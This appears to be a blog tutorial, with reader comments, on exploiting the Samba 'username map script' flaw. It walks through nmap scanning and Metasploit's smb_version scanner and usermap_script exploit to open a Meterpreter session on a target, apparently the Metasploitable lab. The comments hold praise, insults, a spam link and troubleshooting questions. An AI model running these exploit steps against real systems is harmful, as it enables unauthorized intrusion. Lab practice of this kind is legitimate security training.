Hacking and gaining access to Linux by exploiting SAMBA service
Step 1
First, we need to find out the ports and services running on the target system. To find the open ports and services, the command is:
Command: nmap -sS -Pn -A 192.168.2.142
Step 2
Once you find the open ports and service like the samba port and service ready, get set for sending an exploit through that port to create a meterpreter session. To perform this attack, you need to open metasploit.
Step 3
Once you open metasploit, first we need to find the version of samba
Command: -msf> search scanner/samba
(This command used to finding the scanner parameter to find samba version)
Step 4
Once you find the scanners to find the samba version of the target, use the scanner parameter.
Command: msf> use auxiliary/scanner/smb/smb_version
(This command is used to set the scanner parameter)
Command 2: msfauxiliary(smb_version) > set RHOSTS 192.168.2.142
(This command is used to set the IPaddress of the remote host of which you need to find the version)
Command 3: exploit
Step 5
After finding the samba version, perform an attack and gain access to the linux system with the help of the Meterpertersession
Command: msf> use exploit/multi/samba/usermap_script
This is the exploit that we need to select to gain access to system
Command: msf exploit(usermap_script) > set RHOST 192.168.2.142
I’d say a bit weak.
You don’t explain which systems would be vulnerable, under which vulnerability or whether it is going to work or not.
Such a pussy explaination. The title should be “A beginner on how to exploit SAMBA using Backtrack”. 7 years experience should give more details. From scratch to PoC. Instead of using other’s people exploit, you should write your own. I guess you don’t have such a knowledge!
i target the metasploitable lab which is used for your penetration testing skills its is only for education purpose
i am very pratical guy and i jus shared the pratical in which i exploited the vulnerablity of samba 3.0
This module exploits a command execution vulerability in Samba versions 3.0.20 through 3.0.25rc3 when using the non-default “username map script” configuration option. By specifying a username containing shell meta characters, attackers can execute arbitrary commands. No authentication is needed to exploit this vulnerability since this option is used to map usernames prior to authentication
‘@youri its not abt exp its all about the information what i am trying to exchange .don,t be rude be chill bro
‘@youri people like you are absolute crap and jelaous of others. Can never appreciate anyone’s efforts. Critisizm has to be done, but there must be some way. what can we expect from big F*** like Youri???
@ v.p.prabhakaran keep the good work. Nice consize explanation.
‘@prosun thanks mate they don,t respect the inforamtion who delivers
Command tips so effective and it will really help us to operating to this strategies…so thanks for blogger to sharing it. http://www.sintre.com/index.php/about-us
‘@RYAN thnx
It was a good read and I appreciate the information exchange!!! Keep it up, you do have a fan or two
It’s easy to talk bad things about others and forget your own ass…
Prabahakaran Nair shared a very important knowledge about a vulnerability in samba and you guys return with
offensive words there’s no even respect for others, I would say thanks for sharing this with us and don’t worry about those ” PACOVIOS “
I followed each and every step mentioned above in a virtual environment but i,m unable exploit .
At last step it showing message like
Exploit completed but no session created.
Please help me in this.
‘@sati will u using metasploitable lab ?
Hi my version is Samba is 2.2.3a and i ran exactly like mentioned above . It says started reverse double handler and then just stops . Can you tell what the problem is?
regards
mel
Hi Sir, How can we do it without metasploit, like by running a exploit manually